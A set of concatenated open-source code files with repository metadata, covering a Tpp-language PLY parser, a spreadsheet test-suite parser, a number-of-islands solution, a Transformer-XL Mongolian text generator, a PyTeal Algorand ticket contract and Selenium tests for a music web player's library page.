Node(str(p[2]), value = str(p[2]), line = (p.lineno(2) - (self.totalLines - 1)), column = self.f_column(p, 2)),
p[3]
])
else:
p[0] = Node('lista_variaveis', value = 'lista_variaveis', children = [p[1]])
def p_var(self, p):
'''
var : ID
| ID indice
'''
if(len(p) == 3):
p[0] = Node('var', value = 'var', children = [
Node(str(p[1]), value = str(p[1]), line = (p.lineno(1) - (self.totalLines - 1)), column = self.f_column(p, 1)),
p[2]
])
else:
p[0] = Node('var', value = 'var', children = [
Node(str(p[1]), value = str(p[1]), line = (p.lineno(1) - (self.totalLines - 1)), column = self.f_column(p, 1))
])
def p_indice(self, p):
'''
indice : indice ABRE_COLCHETE expressao FECHA_COLCHETE
| ABRE_COLCHETE expressao FECHA_COLCHETE
'''
if(len(p) == 5):
p[0] = Node('indice', value = 'indice', children = [
p[1],
Node(str(p[2]), value = str(p[2]), line = (p.lineno(2) - (self.totalLines - 1)), column = self.f_column(p, 2)),
p[3],
Node(str(p[4]), value = str(p[4]), line = (p.lineno(4) - (self.totalLines - 1)), column = self.f_column(p, 4))
])
else:
p[0] = Node('indice', value = 'indice', children = [
Node(str(p[1]), value = str(p[1]), line = (p.lineno(1) - (self.totalLines - 1)), column = self.f_column(p, 1)),
p[2],
Node(str(p[3]), value = str(p[3]), line = (p.lineno(3) - (self.totalLines - 1)), column = self.f_column(p, 3))
])
def p_tipo(self, p):
'''
tipo : INTEIRO
| FLUTUANTE
'''
p[0] = Node('tipo', value = 'tipo', children = [
Node(str(p[1]), value = str(p[1]), line = (p.lineno(1) - (self.totalLines - 1)), column = self.f_column(p, 1))
])
def p_declaracao_funcao(self, p):
'''declaracao_funcao : tipo cabecalho
| cabecalho'''
if(len(p) == 3):
p[0] = Node('declaracao_funcao', value = 'declaracao_funcao', children = [
p[1],
p[2]
])
else:
p[0] = Node('declaracao_funcao', value = 'declaracao_funcao', children = [p[1]])
def p_cabecalho(self, p):
'''cabecalho : ID ABRE_PARENTESE lista_parametros FECHA_PARENTESE corpo FIM'''
p[0] = Node('cabecalho', value = 'cabecalho', children = [
Node(str(p[1]), value = str(p[1]), line = (p.lineno(1) - (self.totalLines - 1)), column = self.f_column(p, 1)),
Node(str(p[2]), value = str(p[2]), line = (p.lineno(2) - (self.totalLines - 1)), column = self.f_column(p, 2)),
p[3],
Node(str(p[4]), value = str(p[4]), line = (p.lineno(4) - (self.totalLines - 1)), column = self.f_column(p, 4)),
p[5]
])
def p_lista_parametros(self, p):
'''
lista_parametros : lista_parametros VIRGULA parametro
| parametro
| vazio
'''
if(len(p) == 4):
p[0] = Node('lista_parametros', value = 'lista_parametros', children = [
p[1],
Node(str(p[2]), value = str(p[2]), line = (p.lineno(2) - (self.totalLines - 1)), column = self.f_column(p, 2)),
p[3]
])
else:
if(p[1] is not None):
p[0] = Node('lista_parametros', value = 'lista_parametros', children = [p[1]])
else:
p[0] = Node('lista_parametros', value = 'lista_parametros')
def p_parametro(self, p):
'''
parametro : tipo DOIS_PONTOS ID
| parametro ABRE_COLCHETE FECHA_COLCHETE
'''
p[0] = Node('parametro', value = 'parametro', children = [
p[1],
Node(str(p[2]), value = str(p[2]), line = (p.lineno(2) - (self.totalLines - 1)), column = self.f_column(p, 2)),
Node(str(p[3]), value = str(p[3]), line = (p.lineno(3) - (self.totalLines - 1)), column = self.f_column(p, 3))
])
def p_corpo(self, p):
'''
corpo : corpo acao
| vazio
'''
if(len(p) == 3):
p[0] = Node('corpo', value = 'corpo', children = [
p[1],
p[2]
])
else:
p[0] = Node('corpo', value = 'corpo')
def p_acao(self, p):
'''
acao : expressao
| declaracao_variaveis
| se
| repita
| leia
| escreva
| retorna
'''
p[0] = Node('acao', value = 'acao', children = [p[1]])
def p_se(self, p):
'''
se : SE expressao ENTAO corpo FIM
| SE expressao ENTAO corpo SENAO corpo FIM
'''
if(len(p) == 6):
p[0] = Node('condicional', value = 'condicional', children = [
Node(str(p[1]), value = str(p[1]), line = (p.lineno(1) - (self.totalLines - 1)), column = self.f_column(p, 1)),
p[2],
Node(str(p[3]), value = str(p[3]), line = (p.lineno(3) - (self.totalLines - 1)), column = self.f_column(p, 3)),
p[4],
Node(str(p[5]), value = str(p[5]), line = (p.lineno(5) - (self.totalLines - 1)), column = self.f_column(p, 5))
])
else:
p[0] = Node('condicional', value = 'condicional', children = [
Node(str(p[1]), value = str(p[1]), line = (p.lineno(1) - (self.totalLines - 1)), column = self.f_column(p, 1)),
p[2],
Node(str(p[3]), value = str(p[3]), line = (p.lineno(3) - (self.totalLines - 1)), column = self.f_column(p, 3)),
p[4],
Node(str(p[5]), value = str(p[5]), line = (p.lineno(5) - (self.totalLines - 1)), column = self.f_column(p, 5)),
p[6],
Node(str(p[7]), value = str(p[7]), line = (p.lineno(7) - (self.totalLines - 1)), column = self.f_column(p, 7))
])
def p_repita(self, p):
'''
repita : REPITA corpo ATE expressao
'''
p[0] = Node('repita', value = 'repita', children = [
Node(str(p[1]), value = str(p[1]), line = (p.lineno(1) - (self.totalLines - 1)), column = self.f_column(p, 1)),
p[2],
Node(str(p[3]), value = str(p[3]), line = (p.lineno(3) - (self.totalLines - 1)), column = self.f_column(p, 3)),
p[4]
])
def p_atribuicao(self, p):
'''
atribuicao : var ATRIBUICAO expressao
'''
p[0] = Node('atribuicao', value = 'atribuicao', children = [
p[1],
Node(str(p[2]), value = str(p[2]), line = (p.lineno(2) - (self.totalLines - 1)), column = self.f_column(p, 2)),
p[3]
])
def p_leia(self, p):
'''
leia : LEIA ABRE_PARENTESE var FECHA_PARENTESE
'''
p[0] = Node('leia', value = 'leia', children = [
Node(str(p[1]), value = str(p[2]), line = (p.lineno(1) - (self.totalLines - 1)), column = self.f_column(p, 1)),
Node(str(p[2]), value = str(p[2]), line = (p.lineno(2) - (self.totalLines - 1)), column = self.f_column(p, 2)),
p[3],
Node(str(p[4]), value = str(p[4]), line = (p.lineno(4) - (self.totalLines - 1)), column = self.f_column(p, 4))
])
def p_escreva(self, p):
'''
escreva : ESCREVA ABRE_PARENTESE expressao FECHA_PARENTESE
'''
p[0] = Node('escreva', value = 'escreva', children = [
Node(str(p[1]), value = str(p[1]), line = (p.lineno(1) - (self.totalLines - 1)), column = self.f_column(p, 1)),
Node(str(p[2]), value = str(p[2]), line = (p.lineno(2) - (self.totalLines - 1)), column = self.f_column(p, 2)),
p[3],
Node(str(p[4]), value = str(p[4]), line = (p.lineno(4) - (self.totalLines - 1)), column = self.f_column(p, 4))
])
def p_retorna(self, p):
'''
retorna : RETORNA ABRE_PARENTESE expressao FECHA_PARENTESE
'''
p[0] = Node('retorna', value = 'retorna', children = [
Node(str(p[1]), value = str(p[1]), line = (p.lineno(1) - (self.totalLines - 1)), column = self.f_column(p, 1)),
Node(str(p[2]), value = str(p[2]), line = (p.lineno(2) - (self.totalLines - 1)), column = self.f_column(p, 2)),
p[3],
Node(str(p[4]), value = str(p[4]), line = (p.lineno(4) - (self.totalLines - 1)), column = self.f_column(p, 4))
])
def p_expressao(self, p):
'''
expressao : expressao_logica
| atribuicao
'''
p[0] = Node('expressao', value = 'expressao', children = [p[1]])
def p_expressao_logica(self, p):
'''
expressao_logica : expressao_simples
| expressao_logica operador_logico expressao_simples
'''
if(len(p) == 4):
p[0] = Node('expressao_logica', value = 'expressao_logica', children = [
p[1],
p[2],
p[3]
])
else:
p[0] = Node('expressao_logica', value = 'expressao_logica', children = [p[1]])
def p_expressao_simples(self, p):
'''
expressao_simples : expressao_aditiva
| expressao_simples operador_relacional expressao_aditiva
'''
if(len(p) == 4):
p[0] = Node('expressao_simples', value = 'expressao_simples', children = [
p[1],
p[2],
p[3]
])
else:
p[0] = Node('expressao_simples', value = 'expressao_simples', children = [p[1]])
def p_expressao_aditiva(self, p):
'''
expressao_aditiva : expressao_multiplicativa
| expressao_aditiva operador_soma expressao_multiplicativa
'''
if(len(p) == 4):
p[0] = Node('expressao_aditiva', value = 'expressao_aditiva', children = [
p[1],
p[2],
p[3]
])
else:
p[0] = Node('expressao_aditiva', value = 'expressao_aditiva', children = [p[1]])
def p_expressao_multiplicativa(self, p):
'''
expressao_multiplicativa : expressao_unaria
| expressao_multiplicativa operador_multiplicacao expressao_unaria
'''
if(len(p) == 4):
p[0] = Node('expressao_multiplicativa', value = 'expressao_multiplicativa', children = [
p[1],
p[2],
p[3]
])
else:
p[0] = Node('expressao_multiplicativa', value = 'expressao_multiplicativa', children = [p[1]])
def p_expressao_unaria(self, p):
'''
expressao_unaria : fator
| operador_soma fator
| operador_negacao fator
'''
if(len(p) == 3):
p[0] = Node('expressao_unaria', value = 'expressao_unitaria', children = [
p[1],
p[2]
])
else:
p[0] = Node('expressao_unaria', value = 'expressao_unitaria', children = [p[1]])
def p_operador_relacional(self, p):
'''
operador_relacional : MENOR
| MAIOR
| IGUAL
| DIFERENTE
| MENOR_IGUAL
| MAIOR_IGUAL
'''
p[0] = Node('operador_relacional', value = 'operador_relacional', children = [
Node(str(p[1]), value = str(p[1]), line = (p.lineno(1) - (self.totalLines - 1)), column = self.f_column(p, 1))
])
def p_operador_soma(self, p):
'''
operador_soma : MAIS
| MENOS
'''
p[0] = Node('operador_soma', value = 'operador_soma', children = [
Node(str(p[1]), value = str(p[1]), line = (p.lineno(1) - (self.totalLines - 1)), column = self.f_column(p, 1))
])
def p_operador_logico(self, p):
'''
operador_logico : E_LOGICO
| OU_LOGICO
'''
p[0] = Node('operador_logico', value = 'operador_logico', children = [
Node(str(p[1]), value = str(p[1]), line = (p.lineno(1) - (self.totalLines - 1)), column = self.f_column(p, 1))
])
def p_operador_negacao(self, p):
'''
operador_negacao : NEGACAO
'''
p[0] = Node('operador_negacao', value = 'operador_negacao', children = [
Node(str(p[1]), value = str(p[1]), line = (p.lineno(1) - (self.totalLines - 1)), column = self.f_column(p, 1))
])
def p_operador_multiplicacao(self, p):
'''
operador_multiplicacao : MULTIPLICACAO
| DIVISAO
'''
p[0] = Node('operador_multiplicacao', value = 'operador_multiplicacao', children = [
Node(str(p[1]), value = str(p[1]), line = (p.lineno(1) - (self.totalLines - 1)), column = self.f_column(p, 1))
])
def p_fator(self, p):
'''
fator : ABRE_PARENTESE expressao FECHA_PARENTESE
| var
| chamada_funcao
| numero
'''
if(len(p) == 4):
p[0] = Node('fator', value = 'fator', children = [
Node(str(p[1]), value = str(p[1]), line = (p.lineno(1) - (self.totalLines - 1)), column = self.f_column(p, 1)),
p[2],
Node(str(p[3]), value = str(p[3]), line = (p.lineno(3) - (self.totalLines - 1)), column = self.f_column(p, 3))
])
else:
p[0] = Node('fator', value = 'fator', children = [p[1]])
def p_numero(self, p):
'''
numero : NUM_INTEIRO
| NUM_PONTO_FLUTUANTE
| NUM_NOTACAO_CIENTIFICA
'''
p[0] = Node('numero', value = 'numero', children = [
Node(str(p[1]), value = p[1], line = (p.lineno(1) - (self.totalLines - 1)), column = self.f_column(p, 1))
])
def p_chamada_funcao(self, p):
'''
chamada_funcao : ID ABRE_PARENTESE lista_argumentos FECHA_PARENTESE
'''
p[0] = Node('chamada_funcao', value = 'chamada_funcao', children = [
Node(str(p[1]), value = str(p[1]), line = (p.lineno(1) - (self.totalLines - 1)), column = self.f_column(p, 1)),
Node(str(p[2]), value = str(p[2]), line = (p.lineno(2) - (self.totalLines - 1)), column = self.f_column(p, 2)),
p[3],
Node(str(p[4]), value = str(p[4]), line = (p.lineno(4) - (self.totalLines - 1)), column = self.f_column(p, 4))
])
def p_lista_argumentos(self, p):
'''
lista_argumentos : lista_argumentos VIRGULA expressao
| expressao
| vazio
'''
if(len(p) == 4):
p[0] = Node('lista_argumentos', value = 'lista_argumentos', children = [
p[1],
Node(str(p[2]), value = str(p[2]), line = (p.lineno(2) - (self.totalLines - 1)), column = self.f_column(p, 2)),
p[3]
])
else:
if(p[1] is not None):
p[0] = Node('lista_argumentos', value = 'lista_argumentos', children = [p[1]])
else:
p[0] = Node('lista_argumentos', value = 'lista_argumentos')
def p_vazio(self, p):
'''
vazio :
'''
pass
def p_error(self, p):
self.result = False
if p:
print('Sintaxe Inválida do token \'' + str(p.value) + '\' em ' + str(p.lineno) + ':' + str(self.lexer.f_column(p)))
else:
print('Sintaxe Inválida da saída')
def syntactic(self, codeFile, numberOfLines):
self.totalLines = numberOfLines
self.tree = self.parser.parse(codeFile, tracking = True)
return self.tree, self.result | alanrps/Compilador_Linguagem_Tpp | parser.py | parser.py | py | 16,635 | python | pt | code | 0 | github-code | 36 | [
{
"api_name": "lex.Lexer.tokens",
"line_number": 7,
"usage_type": "attribute"
},
{
"api_name": "lex.Lexer",
"line_number": 7,
"usage_type": "name"
},
{
"api_name": "lex.Lexer",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "ply.yacc.yacc",
"line_num... |
7282602903 | ################################################################################
# 1. Including files
################################################################################
import xlrd
################################################################################
# 2. Class definition
################################################################################
class testSuiteCollection:
test_suite_name = ""
testcases = []
def __init__(self, test_suite_name):
self.test_suite_name = str(test_suite_name)
class testcaseCollection:
function_name = ""
testcase_name = ""
invoked_func_precondition = ""
params = []
global_vars = []
def __init__(self, function_name, testcase_name):
self.function_name = str(function_name)
self.testcase_name = str(testcase_name)
class globalVarCollection:
gen_name = ""
type = ""
expected = ""
actual_mem = ""
mask = ""
def __init__(self, gen_name, type, expected, actual_mem, mask):
self.gen_name = str(gen_name)
self.type = str(type)
self.expected = str(expected)
self.actual_mem = str(actual_mem)
self.mask = str(mask)
class paramCollection:
gen_name = ""
type = ""
param_name = ""
init_value = ""
isStructType = "False"
def __init__(self, gen_name, type, param_name, init_value, isStructType):
self.gen_name = str(gen_name)
self.type = str(type)
self.param_name = str(param_name)
self.init_value = str(init_value)
self.isStructType = str(isStructType)
################################################################################
# 3. Function definition
################################################################################
def find_output_position(firstParamColumn):
output_position = firstParamColumn # assume that there is no INPUT data,
# and OUTPUT data begins at first param column.
for i in range(sheet.ncols):
if "Output" == sheet.cell_value(2, i):
output_position = i
return output_position
def isStructure(type):
result = "True"
# check if "type" exists in "basicTypes"
try:
type.index("Struct_")
except ValueError:
result = "False"
return result
################################################################################
# 4. Main processing: XLS file parsing
################################################################################
loc = ("C:\\Users\\PC\\Documents\\GitHub\\STM32F4Discovery\\UT_TestSuite.xls")
# Open Workbook
testcaseSheetList = [6, 8, 9, 10]
firstParamColumn = 3
tcFirstLine = 5
tcNameColumn = 0
tcInvokedFuncColumn = 1
ioTypeRow = 4
ioNameRow = 3
testSuite = testSuiteCollection("ut_usart_driver")
# Open XLS file
wb = xlrd.open_workbook(loc)
for tcSheet in testcaseSheetList:
# Open a sheet
sheet = wb.sheet_by_index(tcSheet)
noRows = sheet.nrows
noCols = sheet.ncols
func_name = sheet.cell_value(0, 1)
output_position = find_output_position(firstParamColumn)
for i in range(tcFirstLine, noRows):
testcase_name = sheet.cell_value(i, tcNameColumn)
testcase_invoked_func = sheet.cell_value(i, tcInvokedFuncColumn)
noParams = (output_position - firstParamColumn) // 2 # division with result of integer number
noGlobalVars = (noCols - output_position) // 2 # division with result of integer number
testcase = testcaseCollection(func_name, testcase_name)
testcase.invoked_func_precondition = testcase_invoked_func
testcase.params = [None]*noParams
testcase.global_vars = [None]*noGlobalVars
# Collect all parameters
index = 0
for j in range(firstParamColumn, output_position, 2):
gen_name = "param_" + str(index + 1)
type = sheet.cell_value(ioTypeRow, j) # unchanged
param_name = sheet.cell_value(ioNameRow, j) # unchanged
init_value = sheet.cell_value(i, j)
isStructType = isStructure(type)
testcase.params[index] = \
paramCollection(gen_name, type, param_name, init_value, isStructType)
index += 1
# Collect all global variables
index = 0
for j in range(output_position, noCols - 1, 2):
gen_name = "global_var_" + str(index + 1)
type = sheet.cell_value(ioTypeRow, j) # unchanged
expected = sheet.cell_value(i, j)
actual_mem = sheet.cell_value(ioNameRow, j) # unchanged
mask = sheet.cell_value(i, j + 1)
testcase.global_vars[index] = \
globalVarCollection(gen_name, type, expected, actual_mem, mask)
index += 1
testSuite.testcases.append(testcase)
| duattn1/STM32F4Discovery_Unit_Testing | Script/UnitTestScript/XlsProcessing.py | XlsProcessing.py | py | 4,938 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "xlrd.open_workbook",
"line_number": 92,
"usage_type": "call"
}
] |
6084331741 | import collections
def number_of_islands(grid):
# this problem can be approached by dfs/bfs approach
# base case
if not grid:
return 0
ROWS, COLS = len(grid), len(grid[0])
visit = set()
island = 0
def bfs(r, c):
# since bfs, need a queue
# append r, c immediately
queue = collections.deque()
queue.append((r, c))
visit.add((r,c))
while queue: # check until queue is empty after popping left
row, col = queue.popleft()
directions = [[1, 0], [-1, 0], [0, 1], [0, -1]]
for dr, dc in directions:
# store current cell by directions
r, c = row + dr, col + dc
# check if satisfies conditions
# 1. in bound
# 2. current cell = 1
# 3. (r,c) not visited yet
if r in range(ROWS) and c in range(COLS) and grid[r][c] == "1" and (r, c) not in visit:
# add to visit & queue
visit.add((r, c))
queue.append((r,c))
# outside of bfs, do nested loop and check if satisfies conditions cell = 1 & r, c not visited yet
for r in range(ROWS):
for c in range(COLS):
if grid[r][c] == "1" and (r,c) not in visit:
bfs(r,c)
island += 1
return island
| phuclinh9802/data_structures_algorithms | blind 75/number_of_islands.py | number_of_islands.py | py | 1,416 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "collections.deque",
"line_number": 18,
"usage_type": "call"
}
] |
8670535309 | import logging
from cterasdk import CTERAException
def suspend_filer_sync(self=None, device_name=None, tenant_name=None):
"""Suspend sync on a device"""
logging.info("Starting suspend sync task.")
try:
device = self.devices.device(device_name, tenant_name)
device.sync.suspend(wait=True)
logging.info("Suspended sync on %s", device.name)
except Exception as e:
logging.warning(e)
logging.error("Error suspending sync")
| ctera/ctools | suspend_sync.py | suspend_sync.py | py | 477 | python | en | code | 4 | github-code | 36 | [
{
"api_name": "logging.info",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "logging.info",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "logging.warning",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "logging.error",
"line_nu... |
8625978148 | import os
import torch
def load_checkpoint(path):
if os.path.isdir(path):
path = os.path.join(path, 'checkpoint_best.pt')
dst = f'cuda:{torch.cuda.current_device()}'
print(f'Loading checkpoint from {path}')
checkpoint = torch.load(path, map_location=dst)
return checkpoint
ckpt = load_checkpoint("./LM-TFM/")
# # adaptive softmax / embedding
cutoffs, tie_projs = [], [False]
cutoffs = [19997, 39997, 199997]
tie_projs += [True] * len(cutoffs)
model_config_base = {
'dropout' : 0.1,
'dropatt' : 0.0,
'tie_weight' : False,
'div_val' : 1,
'pre_lnorm' : True,
'cutoffs' : cutoffs,
'clamp_len' : 400,
}
from transformers import TransfoXLTokenizer, TransfoXLLMHeadModel, TransfoXLConfig
# Initializing a Transformer XL configuration
configuration = TransfoXLConfig.from_dict(model_config_base)
# To match with pre-trained model
configuration.d_embed, configuration.d_head = 512, 64
configuration.d_inner, configuration.d_model = 2048, 512
configuration.mem_len, configuration.n_head = 192, 8
configuration.n_layer, configuration.tgt_len = 16, 192
configuration.vocab_size = 32000
model = TransfoXLLMHeadModel.from_pretrained(pretrained_model_name_or_path=None, state_dict=ckpt['model_state'], config=configuration)
from transformers import PreTrainedTokenizer
from utils.tokenization_sentencepiece import FullTokenizer
from collections import Counter, OrderedDict
from os.path import join, exists
class Vocab(TransfoXLTokenizer):
def __init__(
self,
special=None,
min_freq=0,
max_size=None,
lower_case=False,
delimiter=None,
vocab_file='./data/mn_cased.vocab',
never_split=None,
unk_token="<unk>",
eos_token="</s>",
additional_special_tokens=["<formula>"],
**kwargs
):
super().__init__(
unk_token=unk_token, eos_token=eos_token, additional_special_tokens=additional_special_tokens, **kwargs
)
self.vocab_file = vocab_file
if vocab_file is not None:
self.build_vocab()
def tokenize(self, line, add_eos=False, add_double_eos=False):
tokenizer = FullTokenizer(model_file=join('./data', 'mn_cased.model'),
vocab_file=join('./data', 'mn_cased.vocab'), do_lower_case=False)
line = line.strip()
# convert to lower case
if self.lower_case:
line = line.lower()
# empty delimiter '' will evaluate False
if self.delimiter == '':
symbols = line
else:
symbols = tokenizer.tokenize(line)
if add_double_eos: # lm1b
return ['<S>'] + symbols + ['<S>']
elif add_eos:
return symbols + ['<eos>']
else:
return symbols
def _build_from_file(self, vocab_file):
self.idx2sym = []
self.sym2idx = OrderedDict()
with open(vocab_file, 'r') as f:
for line in f:
symb = line.strip().split()[0]
self.add_symbol(symb)
self.unk_idx = self.sym2idx['<unk>']
def build_vocab(self):
if self.vocab_file:
print('building vocab from {}'.format(self.vocab_file))
self._build_from_file(self.vocab_file)
print('final vocab size {}'.format(len(self)))
else:
print('building vocab with min_freq={}, max_size={}'.format(
self.min_freq, self.max_size))
self.idx2sym = []
self.sym2idx = OrderedDict()
for sym in self.special:
self.add_special(sym)
for sym, cnt in self.counter.most_common(self.max_size):
if cnt < self.min_freq: break
self.add_symbol(sym)
print('final vocab size {} from {} unique tokens'.format(
len(self), len(self.counter)))
model.to('cuda')
model.eval()
model.half()
cool_tokenizer = Vocab()
# reference - https://github.com/huggingface/transformers/blob/2ba147ecffa28e5a4f96eebd09dcd642117dedae/examples/run_generation.py
def text_generation(prompt_text, temp, topk, topp, beams, penalty, do_sample):
encoded_prompt = cool_tokenizer.encode(prompt_text, return_tensors="pt")
encoded_prompt = encoded_prompt.to('cuda')
output_sequences = model.generate(
input_ids=encoded_prompt,
max_length=20,
temperature=temp,
top_k=topk,
top_p=topp,
num_beams=beams,
repetition_penalty=penalty,
do_sample=do_sample,
)
# Batch size == 1. to add more examples please use num_return_sequences > 1
generated_sequence = output_sequences[0].tolist()
text = cool_tokenizer.decode(generated_sequence, skip_special_tokens=True, clean_up_tokenization_spaces=True)
text = [word.replace("▁", " ") for word in text.split()]
return ' '.join(text)
print(text_generation("УИХ ", temp=1.0, topk=5, topp=1, beams=1, penalty=1.0, do_sample=True)) | enod/Nvidia-Transformer-XL | pytorch/generate.py | generate.py | py | 5,024 | python | en | code | 5 | github-code | 36 | [
{
"api_name": "os.path.isdir",
"line_number": 5,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 5,
"usage_type": "attribute"
},
{
"api_name": "os.path.join",
"line_number": 6,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 6,
... |
34366485863 | from scripts.leet75.reverse_string import Solution
class Test:
test_cases = [
[["h", "e", "l", "l", "o"], ["o","l","l","e","h"]],
[["H","a","n","n","a","h"], ["h","a","n","n","a","H"]],
[["h"], ["h"]],
[[], []],
]
def test_reverse_string(self):
soln = Solution()
for case, expected in self.test_cases:
assert soln.reverseString(case) == expected
def test_reverse_string_recursive(self):
soln = Solution()
for case, expected in self.test_cases:
assert soln.reverseStringRecursive(case) == expected
if __name__ == '__main__':
soln = Solution()
inp1 = ["h", "e", "l", "l", "o"]
print(soln.reverseString(inp1)) | TrellixVulnTeam/learning_to_test_code_BL81 | tests/leet75/test_reverse_string.py | test_reverse_string.py | py | 740 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "scripts.leet75.reverse_string.Solution",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "scripts.leet75.reverse_string.Solution",
"line_number": 20,
"usage_type": "call"
},
{
"api_name": "scripts.leet75.reverse_string.Solution",
"line_number": 27,
... |
11715375830 | from typing import Literal
import beaker as bk
from pyteal import (
Expr,
Global,
InnerTxnBuilder,
Int,
Seq,
Txn,
TxnField,
TxnType,
abi,
)
app = bk.Application("EventTicket")
@app.external
def create_asset(
assetName: abi.String,
assetUrl: abi.String,
assetTotal: abi.Uint64,
managerAddress: abi.Address,
metadataHash: abi.StaticBytes[Literal[32]],
) -> Expr:
return Seq( # Seq is used to group a set of operations with only the last returning a value on the stack
# Start to build the transaction builder
InnerTxnBuilder.Begin(),
# This method accepts a dictionary of TxnField to value so all fields may be set
InnerTxnBuilder.SetFields(
{
TxnField.type_enum: TxnType.AssetConfig,
TxnField.config_asset_name: assetName.get(),
TxnField.config_asset_url: assetUrl.get(),
TxnField.config_asset_manager: managerAddress.get(),
TxnField.config_asset_clawback: Global.current_application_address(),
TxnField.config_asset_reserve: Global.current_application_address(),
TxnField.config_asset_freeze: Global.current_application_address(),
TxnField.config_asset_total: assetTotal.get(),
TxnField.config_asset_metadata_hash: metadataHash.get(),
TxnField.config_asset_decimals: Int(0),
}
),
# Submit the transaction we just built
InnerTxnBuilder.Submit(),
)
@app.external
def get_asset(asset: abi.Asset) -> Expr:
return Seq( # Seq is used to group a set of operations with only the last returning a value on the stack
# Start to build the transaction builder
InnerTxnBuilder.Begin(),
# This method accepts a dictionary of TxnField to value so all fields may be set
InnerTxnBuilder.SetFields(
{
TxnField.type_enum: TxnType.AssetTransfer,
TxnField.xfer_asset: asset.asset_id(),
TxnField.asset_amount: Int(1),
TxnField.asset_receiver: Txn.sender(),
TxnField.asset_sender: Global.current_application_address(),
}
),
# Submit the transaction we just built
InnerTxnBuilder.Submit(),
)
if __name__ == "__main__":
spec = app.build()
spec.export("artifacts")
| freddyblockchain/AlgokitProject | smart_contracts/code/eventticket.py | eventticket.py | py | 2,429 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "beaker.Application",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "pyteal.abi.String",
"line_number": 21,
"usage_type": "attribute"
},
{
"api_name": "pyteal.abi",
"line_number": 21,
"usage_type": "name"
},
{
"api_name": "pyteal.abi.Strin... |
19933632487 | """
Your Library Page Testing
This script tests the Your Library Page functions and report the results to allure
This script requires `allure` and `pytest` be installed within the Python environment you are running this script in
"""
import time
import allure
import pytest
from Web_Testing.Pages.WebPlayerLibrary import WebPlayerLibrary
from Web_Testing.helperClasses import WebHelper
from Web_Testing.Pages.LoginPage import LoginPage
from Web_Testing.Pages.SignupPage import SignupPage
from Web_Testing.Pages.WebPlayerHome import WebPlayerHome
from Web_Testing.Pages.LoggedOutHome import LoggedOutHome
from selenium import webdriver
from Web_Testing.helperClasses import ConstantsClass
@allure.parent_suite("End to End testing")
@allure.suite("Your Library Page")
@allure.feature("Your Library Page")
@allure.severity(allure.severity_level.BLOCKER)
class TestWebPlayerLibrary:
driver = WebHelper().firefox_driver_init()
helper = WebHelper()
helper.set_driver(driver)
@pytest.yield_fixture
def setup_initial(self):
self.driver.get(WebHelper().get_login_url())
self.driver.maximize_window()
yield
self.driver.refresh()
@pytest.yield_fixture
def setup(self):
self.driver.get(self.helper.base_url + "webplayer/home")
self.driver.maximize_window()
yield
# self.driver.close()
@pytest.yield_fixture
def setup_final(self):
self.driver.get(self.helper.base_url + "webplayer/home")
self.driver.maximize_window()
yield
self.driver.close()
# Test #1 -> Your Library Button
@allure.severity(allure.severity_level.BLOCKER)
@allure.story("Testing Your Library Liked Songs Play Button")
@allure.title("Liked Songs Play Button")
@allure.description("Testing Your Library Liked Songs Play Button")
@pytest.mark.Do
@pytest.mark.YourLibrary
def test_case_1(self, setup_initial):
time.sleep(3)
lp = LoginPage(self.driver)
lp.login_to_spotify("test1@test.com", "test123")
time.sleep(3)
self.driver.get(self.helper.base_url + "webplayer/home")
time.sleep(3)
web_player_home = WebPlayerHome(self.driver)
web_player_home.click_your_library()
time.sleep(2)
web_player_library = WebPlayerLibrary(self.driver)
if web_player_library.check_liked_songs_click():
self.helper.report_allure("SUCCESS: Your Library Liked songs cards are functional")
assert True
else:
self.helper.report_allure("FAILURE: Your Library Liked songs cards are not functional")
assert False
# Test #2 -> Playlists Cards
@allure.severity(allure.severity_level.BLOCKER)
@allure.story("Testing Your Library playlists cards")
@allure.title("Playlists cards")
@allure.description("Testing Your Library Playlists cards")
@pytest.mark.Do
@pytest.mark.YourLibrary
def test_case_2(self, setup):
time.sleep(2)
web_player_home = WebPlayerHome(self.driver)
web_player_home.click_your_library()
time.sleep(2)
web_player_library = WebPlayerLibrary(self.driver)
if web_player_library.check_card_click(0, True):
self.helper.report_allure("SUCCESS: Your Library page playlist cards are functional")
assert True
else:
self.helper.report_allure("FAILURE: Your Library page playlist cards are not functional")
assert False
# Test #3 -> Liked Songs Text Button
@allure.severity(allure.severity_level.BLOCKER)
@allure.story("Clicking on the Liked Songs Text in the card in Your Library Page")
@allure.title("Clicking Liked Songs Card text")
@allure.description("Clicking on the Liked Songs Text in the card in Your Library Page")
@pytest.mark.Do
@pytest.mark.YourLibrary
def test_case_3(self, setup):
time.sleep(2)
web_player_home = WebPlayerHome(self.driver)
web_player_home.click_your_library()
time.sleep(2)
web_player_library = WebPlayerLibrary(self.driver)
web_player_library.click_liked_songs_txt()
if self.helper.url_has("webplayer/likedplay"):
self.helper.report_allure("SUCCESS: The Liked Songs Card button in your Library page is functional")
assert True
else:
self.helper.report_allure("FAILURE: The Liked Songs Card button in your Library page is not functional")
assert False
# Test #4 -> Your Library Button with empty playlist
@allure.severity(allure.severity_level.BLOCKER)
@allure.story("Testing Your Library Liked Songs Play Button with empty playlist")
@allure.title("Liked Songs Play Button with empty playlist")
@allure.description("Testing Your Library Liked Songs Play Button with empty playlist")
@pytest.mark.Do
@pytest.mark.YourLibrary
def test_case_4(self, setup_final):
web_player_home = WebPlayerHome(self.driver)
web_player_home.click_logout()
time.sleep(2)
web_player_home.click_login()
time.sleep(3)
lp = LoginPage(self.driver)
lp.login_to_spotify("abdallah@gmail.com", "1234567")
time.sleep(3)
self.driver.get(self.helper.base_url + "webplayer/home")
time.sleep(3)
web_player_home = WebPlayerHome(self.driver)
web_player_home.click_your_library()
time.sleep(2)
web_player_library = WebPlayerLibrary(self.driver)
if web_player_library.check_liked_songs_click():
assert True
else:
assert False
| Project-X9/Testing | Web_Testing/Tests/test_yourLibrary.py | test_yourLibrary.py | py | 5,634 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "Web_Testing.helperClasses.WebHelper",
